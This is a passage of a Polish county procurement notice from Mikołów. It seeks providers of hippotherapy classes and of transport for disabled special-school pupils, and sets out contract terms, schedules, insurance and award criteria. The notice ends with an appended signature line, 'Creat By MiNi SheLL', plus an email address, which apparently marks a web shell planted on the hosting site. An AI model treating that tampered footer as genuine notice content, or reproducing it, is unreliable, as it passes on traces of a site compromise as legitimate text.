6. zmiany w kolejności i terminach wykonania przedmiotu zamówienia, na skutek zdarzeń losowych lub innych okoliczności,
7. zmiany terminów w harmonogramie płatności, o którym mowa w § 4 ust.4, na skutek zdarzeń losowych lub innych okoliczności, 
8. zmiana osób odpowiedzialnych za wykonanie zadania ze strony Wykonawcy i Zamawiającego, która może nastąpić tylko na podstawie obiektywnych przesłanek zaakceptowanych przez Zamawiającego,
9. zmiana składu osobowego zespołu osób prowadzących zajęcia, a w szczególności dodanie nowych osób lub zamiana na inne osoby pod warunkiem, że nowe osoby będą posiadały kwalifikacje i doświadczenie nie niższe niż odpowiednie wymagania określone w SIWZ; zmiana może nastąpić tylko na podstawie obiektywnych przesłanek zaakceptowanych przez Zamawiającego.
Zadanie II.
W związku z art. 144 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień (tekst jednolity: Dz. U. z dnia 09.08.2013 roku, poz. 907) Zamawiający przewiduje możliwość zmiany istotnych postanowień Umowy w stosunku do treści Oferty, w następujących okolicznościach:
1. konieczność wprowadzenia  takich  zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy,
2. gdy zmiana postanowień umownych jest korzystna dla Zamawiającego,
3. w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na współfinansowanie zamówienia na usługę.
4. w przypadku wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie zewnętrzne, nieprzewidywalne i poza kontrolą stron niniejszej umowy, którego skutkom nie można zapobiec, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu,
5. w przypadku zmiany stanu prawnego, który będzie wnosił nowe wymagania co do sposobu realizacji jakiegokolwiek elementu usług,
6. zmiany w kolejności i terminach wykonania przedmiotu zamówienia, na skutek zdarzeń losowych lub innych okoliczności,
7. zmiany terminów w harmonogramie płatności, o którym mowa w § 5 ust.6, na skutek zdarzeń losowych lub innych okoliczności, 
8. zmiana osób odpowiedzialnych za wykonanie zadania ze strony Wykonawcy i Zamawiającego, która może nastąpić tylko na podstawie obiektywnych przesłanek zaakceptowanych przez Zamawiającego,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mikolowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Mikołowie,ul.Żwirki i Wigury 4a,43-190 Mikołów, wejście B,parter,Biuro Podawcze,osobiście lub za zaliczeniem pocztowym; cena: 5 PLN plus koszt wysyłki..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.04.2015 godzina 09:30, miejsce: Starostwo Powiatowe w Mikołowie,ul.Żwirki i Wigury 4a,43-190 Mikołów, wejście B,parter,kancelaria - pokój nr 127..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 06.05.2015.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Kompleksowa Edukacja Specjalna - Program Rozwoju Szkół Specjalnych Powiatu Mikołowskiego jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE I. Przeprowadzenie dodatkowych zajęć specjalistycznych z hipoterapii, przewidzianych w ramach projektu pn. Kompleksowa Edukacja Specjalna - Program Rozwoju Szkół Specjalnych Powiatu Mikołowskiego współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie dodatkowych zajęć specjalistycznych z hipoterapii, przewidzianych w ramach projektu pn. Kompleksowa Edukacja Specjalna - Program Rozwoju Szkół Specjalnych Powiatu Mikołowskiego współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.

Nr 
Zadania 
Rodzaj zajęć
Nazwa zajęć
Liczba grup

Liczba h zegarowych na : 
I)
a) grupę
b) razem
II)
a) grupę
b) razem

Liczba uczniów 
a) min. w 1 gr.
b) razem
1. 
Dodatkowe zajęcia specjalistyczne
Hipoterapia
6 grup

I) a) 1gr. x 15h 
b) 4 gr. x 15h = 60h
II) a) 1 gr. x 12,5h
b) 2 gr. x 12,5h=25h
a) 5 os.
b) 30 os.


LICZBA GODZIN ŁĄCZNIE                                                                                         85 h
85 h


A.Zajęcia odbywać się będą w 6 grupach po 5 osób, według następującego rozkładu:
- 4 grupy po 6 wyjazdów - razem 24 wyjazdy po 2,5 godziny, łącznie 60 godzin,
- 2 grupy po 5 wyjazdów - razem 10 wyjazdów po 2,5 godziny, łącznie 25 godzin,
co daje razem 85 godzin zajęć hipoterapii,  przy czym jako 1 godzinę zajęć Zamawiający rozumie 60 minut, w tym rozgrzewkę, jazdę konną, zajęcia teoretyczne dotyczące budowy konia, jeździectwa, opieki i pielęgnacji konia.
B.Wykonawca zobowiązany jest do wykupienia ubezpieczenia od następstw nieszczęśliwych wypadków w trakcie zajęć, w drodze na zajęcia i po zajęciach na sumę 15 000,00 zł. oraz przekazania dokumentu potwierdzającego wykupienie ubezpieczenia Zamawiającemu do 3 dni przed rozpoczęciem zajęć.
C. Zajęcia z hipoterapii mają na celu:

- wzmocnienie procesu usprawniania psychoruchowego dzieci i młodzieży z różnymi schorzeniami i zaburzeniami rozwojowymi;
-  korekcję wad postawy, doskonalenie równowagi, koordynację i poczucie rytmu;
- zmniejszenie napięcia mięśniowego, które towarzyszy uszkodzeniu ośrodkowego układu nerwowego;
- normalizowanie napięcia mięśni spastycznych, poprawienie koordynacji wzrokowo-ruchowej i orientacji w schemacie ciała, kształtowanie orientacji przestrzennej, trenowanie zmysłu równowagi. 
D. W ciągu jednej godziny terapii Wykonawca zapewni obecność 1 opiekuna grupy oraz 1 hipoterapeuty - zapewniających zarówno bezpieczeństwo fizyczne dzieci, jak i odpowiedni poziom merytoryczny terapii.
E. Program zajęć ma zawierać co najmniej niżej wymienione moduły:
szkolenie dla opiekunów dzieci podczas zajęć hipoterapii
rozgrzewkę fizyczną i ćwiczenia programowe usprawniające
jazdę konną wraz z ćwiczeniami
poznawanie budowy ciała konia
kształtowanie orientacji w schemacie własnego ciała
doskonalenie sprawności ruchowej
stymulowanie zmysłów: słuchu, wzroku, dotyku, węchu
ćwiczenie koncentracji uwagi
wyzwalanie spontanicznej aktywności dziecka w pracy z koniem
naukę troski o higienę własną i konia - mycie rąk, czesanie, karmienie
okazywanie emocji i uczuć związanych z kontaktem ze zwierzętami
naukę samodzielności - samodzielne wykonywanie zadań z udziałem konia - czesanie, prowadzenie na uprzęży etc.
określanie związków przyczynowo-skutkowych, rozpoznawanie kolorów i kształtów, różnic i podobieństw.
ćwiczenia relaksacyjne

F. Zajęcia muszą być prowadzone w miejscu bezpiecznym, ogrodzonym, posiadającym odpowiednie podłoże zapewniające stabilność, antypoślizgowe (np. piasek, trociny), ośrodek musi być wyposażony w WC dostosowane dla osób niepełnosprawnych; w ośrodku powinno znajdować się pomieszczenie socjalne, w którym uczestnicy oczekujący na zajęcia mogą przebywać; ośrodek hipoterapii (stadnina) musi posiadać zadaszoną ujeżdżalnię.

G. Ze względu na niepełnosprawność psychoruchową dzieci znacznie utrudniającą funkcjonowanie uczestników / uczestniczek w czasie długotrwałej podróży, przedmiot zamówienia należy zrealizować w odległości nie dalszej niż 35 km liczonych od siedziby Zespołu Szkół Nr 2 Specjalnych w Mikołowie, ul. Pokoju 4a, 43 - 190 Mikołów - na podstawie  danych  GPS, trasa najkrótsza, zmierzona na samochód osobowy.
H. Za bezpieczeństwo dzieci podczas terapii odpowiada hipoterapeuta. 
I. Godziny odbywania się zajęć zostaną ustalone z Zamawiającym.
J. Wykonywanie w/w zadania odbywać się będzie przez czas trwania umowy od poniedziałku do soboty w godzinach uzgodnionych z Koordynatorem Projektu. 
Prawidłowość wykonania umowy zostanie potwierdzona poprzez prowadzenie dzienników zajęć i list obecności.
Wykonawca przeprowadzi w trakcie w/w zajęć ankiety ewaluacyjne oraz raport ewaluacyjny z przeprowadzonych ankiet. 
Wzory list obecności, dzienników zajęć, ankiet i raportów ewaluacyjnych zostaną uzgodnione z Koordynatorem Projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4, 80.51.13.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. termin płatności - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE II. Organizacja dowozu na zajęcia specjalistyczne z hipoterapii przewidzianych w ramach projektu pn. Kompleksowa Edukacja Specjalna - Program Rozwoju Szkół Specjalnych Powiatu Mikołowskiego współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja dowozu na zajęcia specjalistyczne z hipoterapii przewidzianych w ramach projektu pn. Kompleksowa Edukacja Specjalna - Program Rozwoju Szkół Specjalnych Powiatu Mikołowskiego współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.

Transport

Lp.

Rodzaj zajęć

Liczba uczniów

Ilość wyjazdów
Prognozowana
liczba km


1.
Hipoterapia 
6 gr. po 5 osób = 30 osób
34
3400


A. Do zadań Wykonawcy należy dowóz uczestników projektu na zajęcia specjalistyczne z hipoterapii, a po zakończonych zajęciach przywóz dzieci do domów na terenie Powiatu Mikołowskiego. Wykonywanie zadań odbywać się będzie od poniedziałku do soboty w godzinach uzgodnionych z Koordynatorem Projektu. Dokładne godziny dowozu i przywozu dzieci uzależnione są od ich rozkładu zajęć, przy czym Zamawiający zastrzega, że czas przejazdu dziecka z miejsca zamieszkania do placówki, gdzie realizowane będą zajęcia oraz po zajęciach z placówki do miejsca zamieszkania nie może przekroczyć jednej godziny w jedną stronę.

B. Maksymalna liczba osób korzystająca jednocześnie z usługi transportowej to 10 uczniów + 2 opiekunów + kierowca + 1 miejsce wolne.

C. Samochody muszą być wyraźnie oznakowane jako przewóz dzieci oraz osób niepełnosprawnych.

D. Wykonawca jest zobowiązany do opłacenia ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności (przewozu osób) na kwotę min. 50 000,00 zł.

E. Kierowca każdego samochodu zobowiązany jest do prowadzenia szczegółowego rejestru przejechanych km na każdej trasie. Wzór Karty przejazdu stanowi załącznik do umowy. Wykonawca zobowiązany jest do przedłożenia karty przejazdu Zamawiającemu do końca każdego okresu rozliczeniowego ujętego w harmonogramie płatności zgodnie z § 4 ust. 4 umowy.   

F. Wykonawca w czasie dowozu dzieci musi zapewnić na własny koszt, w każdym z samochodów dowożących dzieci opiekę osoby, która zagwarantuje przewożonym dzieciom warunki bezpieczeństwa w trakcie wsiadania, wysiadania oraz przejazdu. Kierowca nie może być jednocześnie opiekunem. Opiekun podpisuje Deklarację w sprawie ochrony zdrowia i życia dziecka w trakcie przejazdów na zajęcia i z powrotem, której wzór stanowi załącznik do umowy.

G. Wykonywanie w/w zadania odbywać się będzie przez czas trwania umowy od poniedziałku do soboty w godzinach uzgodnionych z Koordynatorem Projektu. 

H. Wykonywanie w/w zadania odbywać się będzie na terenie powiatu mikołowskiego i okolic, jednak w odległości nie dalszej niż 35 km liczonych od siedziby Zespołu Szkół  Nr 2 Specjalnych w Mikołowie, ul. Pokoju 4a, 43 - 190 Mikołów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.17.20.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. termin płatności - 2</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com